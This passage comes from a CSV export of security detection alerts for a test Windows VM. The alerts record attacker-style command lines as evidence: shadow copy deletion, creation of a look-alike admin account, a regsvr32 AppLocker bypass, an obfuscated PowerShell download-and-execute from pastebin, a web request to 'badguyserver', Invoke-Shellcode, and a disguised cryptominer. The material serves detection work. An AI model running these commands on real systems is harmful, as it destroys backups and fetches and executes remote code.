""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:23,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
166,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:17,2019-01-15 17:15:17,6a71b543-4832-4658-8467-825aeafbe031,2518547282825448815_6a71b543-4832-4658-8467-825aeafbe031,Detection,Microsoft,Suspicious Volume Shadow Copy Activity,Suspicious Volume Shadow Copy Activity,Suspicious Volume Shadow Copy Activity,"Analysis of host data has detected a shadow copy deletion activity on the resource.
Volume Shadow Copy (VSC) is an important artifact that stores data snapshots.
Some malware and specifically Ransomware, targets VSC to sabotage backup strategies.",High,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\windows\\system32\\vssadmin.exe"",
""command line"": ""vssadmin delete shadows /all /quiet"",
""parent process"": ""cmd.exe"",
""process id"": ""0x1be8"",
""account logon id"": ""0x1bd592e"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0x12bc"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Shadow Copy Delete\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Shadow-Copy-Delete.pdf?sv=2018-03-28&sr=b&sig=JbKldE2C8FDd%2FqIgj7Pb53OzH9DT9YTgPqjd%2F15j9b4%3D&spr=https&st=2019-01-15T11:50:23Z&se=2019-04-15T12:05:23Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=0c8d0493-55c3-4b3f-a0b0-c8d4d2ce0343\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""vssadmin.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1be8"",
""CommandLine"": ""vssadmin delete shadows /all /quiet"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:17.4551184Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:17.4551184Z"",
""EndTimeUtc"": ""2019-01-15T17:15:17.4551184Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:23,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
167,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:03,2019-01-15 17:15:03,3db7e1e7-2edc-4dd9-8c1d-d908f5b8a904,2518547282966696689_3db7e1e7-2edc-4dd9-8c1d-d908f5b8a904,Detection,Microsoft,Suspicious Account Creation Detected,Suspicious Account Creation Detected,Suspicious Account Creation Detected,"Analysis of host data on MSTICALERTSWIN1 detected creation or use of a local account adm1nistrator : this account name closely resembles a standard Windows account or group name 'administrator'. This is potentially a rogue account created by an attacker, so named in order to avoid being noticed by a human administrator.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""adm1nistrator"",
""Account Session Id"": ""0x0"",
""Suspicious Process"": ""c:\\windows\\system32\\net.exe"",
""Suspicious Command Line"": ""net user adm1nistrator bob_testing /add"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1b7c"",
""Suspicious Account Name"": ""adm1nistrator"",
""Similar To Account Name"": ""administrator"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Name"": ""adm1nistrator"",
""Host"": {
""$ref"": ""4""
},
""Type"": ""account"",
""LogonId"": ""0x0""
},
{
""$id"": ""6"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""7"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""8"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""9"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""net.exe"",
""Type"": ""file""
},
{
""$id"": ""10"",
""ProcessId"": ""0x1b7c"",
""CommandLine"": ""net user adm1nistrator bob_testing /add"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:03.330331Z"",
""ImageFile"": {
""$ref"": ""9""
},
""Account"": {
""$ref"": ""8""
},
""ParentProcess"": {
""$ref"": ""7""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""11"",
""SessionId"": ""0x0"",
""StartTimeUtc"": ""2019-01-15T17:15:03.330331Z"",
""EndTimeUtc"": ""2019-01-15T17:15:03.330331Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""5""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:07,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
168,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:10,2019-01-15 17:15:10,82730ffa-b9ce-43f4-bf3c-a97113107cc5,2518547282896095305_82730ffa-b9ce-43f4-bf3c-a97113107cc5,Detection,Microsoft,Potential attempt to bypass AppLocker detected,Potential attempt to bypass AppLocker detected,Potential attempt to bypass AppLocker detected,"Analysis of host data on MSTICALERTSWIN1 detected a potential attempt to bypass AppLocker restrictions. AppLocker can be configured to implement a policy that limits what executables are allowed to run on a Windows system. The command line pattern similar to that identified in this alert has been previously associated with attacker attempts to circumvent AppLocker policy by using trusted executables (allowed by AppLocker policy) to execute untrusted code. This could be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1bd592e"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\regsvr32.exe"",
""Suspicious Command Line"": "".\\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0xd54"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""regsvr32.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0xd54"",
""CommandLine"": "".\\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:10.3904694Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:10.3904694Z"",
""EndTimeUtc"": ""2019-01-15T17:15:10.3904694Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:15,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
169,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:11,2019-01-15 17:15:11,31ae6eeb-bd1d-4018-8df9-eeedd60bf1ab,2518547282883193041_31ae6eeb-bd1d-4018-8df9-eeedd60bf1ab,Detection,Microsoft,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,"Analysis of host data detected a powershell script running on MSTICALERTSWIN1 that has features in common with known suspicious scripts. This script could either be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1bd592e"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell -noninteractive -noprofile -command \""invoke-expression get-process; invoke-webrequest -uri http://badguyserver/pwnme\"""",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x16f4"",
""Suspicious Script"": "".\\powershell -Noninteractive -Noprofile -Command \""Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\"""",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x16f4"",
""CommandLine"": "".\\powershell -noninteractive -noprofile -command \""invoke-expression get-process; invoke-webrequest -uri http://badguyserver/pwnme\"""",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:11.6806958Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:11.6806958Z"",
""EndTimeUtc"": ""2019-01-15T17:15:11.6806958Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:15,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
170,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:11,2019-01-15 17:15:11,ed5bcf39-ffd3-468a-82e3-28e108d4f06f,2518547282881581273_ed5bcf39-ffd3-468a-82e3-28e108d4f06f,Detection,Microsoft,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,"Analysis of host data detected a powershell script running on MSTICALERTSWIN1 that has features in common with known suspicious scripts. This script could either be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1bd592e"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell invoke-shellcode.ps1"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1724"",
""Suspicious Script"": "".\\powershell Invoke-Shellcode.ps1"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1724"",
""CommandLine"": "".\\powershell invoke-shellcode.ps1"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:11.8418726Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:11.8418726Z"",
""EndTimeUtc"": ""2019-01-15T17:15:11.8418726Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:15,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
171,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:12,2019-01-15 17:15:12,bd1a0865-a507-4e2b-b8df-613238a950df,2518547282874783943_bd1a0865-a507-4e2b-b8df-613238a950df,Detection,Microsoft,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,"Analysis of host data detected a powershell script running on MSTICALERTSWIN1 that has features in common with known suspicious scripts. This script could either be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1bd592e"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell -c {iex (new-object net.webclient).downloadstring(('ht'+(\""{2}{0}{1}\""-f ':/','/paste','tp')+'bin/'+'raw/'+(\""{1}{0}\""-f'em17','pqcw')));}"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1848"",
""Suspicious Script"": "".\\powershell -c {IEX (New-Object Net.WebClient).DownloadString(('ht'+(\""{2}{0}{1}\""-f ':/','/paste','tp')+'bin/'+'raw/'+(\""{1}{0}\""-f'Em17','pqCw')));}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1848"",
""CommandLine"": "".\\powershell -c {iex (new-object net.webclient).downloadstring(('ht'+(\""{2}{0}{1}\""-f ':/','/paste','tp')+'bin/'+'raw/'+(\""{1}{0}\""-f'em17','pqcw')));}"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:12.5216056Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:12.5216056Z"",
""EndTimeUtc"": ""2019-01-15T17:15:12.5216056Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:15,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
172,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:10,2019-01-15 17:15:10,35c8d588-ddf7-46b5-a0bf-f47023f9343c,2518547282892925953_35c8d588-ddf7-46b5-a0bf-f47023f9343c,Detection,Microsoft,Digital currency mining related behavior detected,Digital currency mining related behavior detected,Digital currency mining related behavior detected,Analysis of host data on MSTICALERTSWIN1 detected the execution of a process or command normally associated with digital currency mining.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1bd592e"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\suchost.exe"",
""Suspicious Command Line"": "".\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1b8c"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""suchost.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1b8c"",
""CommandLine"": "".\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:10.7074046Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:10.7074046Z"",
""EndTimeUtc"": ""2019-01-15T17:15:10.7074046Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:15,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
173,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:11,2019-01-15 17:15:11,d65aa787-e867-43b1-9182-025a1a38173a,2518547282880013417_d65aa787-e867-43b1-9182-025a1a38173a,Detection,Microsoft,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,"Analysis of host data detected a powershell script running on MSTICALERTSWIN1 that has features in common with known suspicious scripts. This script could either be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1bd592e"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell invoke-reversednslookup.ps1"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1be4"",
""Suspicious Script"": "".\\powershell Invoke-ReverseDnsLookup.ps1"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1be4"",
""CommandLine"": "".\\powershell invoke-reversednslookup.ps1"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:11.9986582Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:11.9986582Z"",
""EndTimeUtc"": ""2019-01-15T17:15:11.9986582Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:15,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
174,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:10,2019-01-15 17:15:10,0073e6d8-6c2e-42e4-8966-d1f5a3dd3517,2518547282892925953_0073e6d8-6c2e-42e4-8966-d1f5a3dd3517,Detection,Microsoft,Suspiciously named process detected,Suspiciously named process detected,Suspiciously named process detected,Analysis of host data on MSTICALERTSWIN1 detected a process whose name is very similar to but different from a very commonly run process (svchost). While this process could be benign attackers are known to sometimes hide in plain sight by naming their malicious tools to resemble legitimate process names.,High,False,"{
""Account Session Id"": ""0x1bd592e"",
""Compromised Host"": ""MSTICALERTSWIN1"",
""Parent Process"": ""cmd.exe"",
""Process Id"": ""0x1b8c"",
""Similar To Process Name"": ""svchost"",
""Suspicious Command Line"": "".\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\suchost.exe"",
""Suspicious Process Name"": ""suchost.exe"",
""User Name"": ""MSTICAlertsWin1\\MSTICAdmin"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""2"",
